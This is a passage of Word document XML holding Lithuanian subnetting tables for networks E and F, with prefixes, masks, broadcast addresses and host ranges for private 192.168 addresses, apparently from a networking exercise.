                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="162A08FE" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>255.255.255.240</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="65A7C4A0" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>255.255.255.248</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6B1C2495" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57D87A53" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="26D999BF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.10.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="04EBF4D4" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.10.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="28E5F359" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31B4517B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6DA69E24" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2C0DCFB4" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="772D20E0" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18B577B3" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="04BDC3C1" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.10.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7F0B7FA7" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.10.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19533148" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="3001"/>
        <w:gridCol w:w="3003"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4C15F662" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="27964D08" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4B326D7D" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0199FC93" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0B7B4742" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="136956C5" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2B54DD14" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="689F3328" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3E7A667D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.20.0/27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="78BAA4E5" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.20.0/26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="205796F1" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71B213B7" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="57AB504F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>255.255.255.224</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6234D837" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>255.255.255.192</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4B9E2333" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B4650AC" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3391CE5F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.20.31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7BA6DDF6" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.20.63</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="25894EB2" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CB926AF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="360DC22B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.20.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="48DEC71C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.20.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="51992B30" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F9CCE1F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5D9C2B5D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.20.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4B388027" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.20.62</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C1AB42A" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="3001"/>
        <w:gridCol w:w="3003"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="40C24356" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="277EA665" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="03A1FC2E" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="779E217E" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0877C428" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="75ACDCDD" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1DFC3A04" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="785427C8" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4F8710E7" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.30.0/27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0BA04177" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
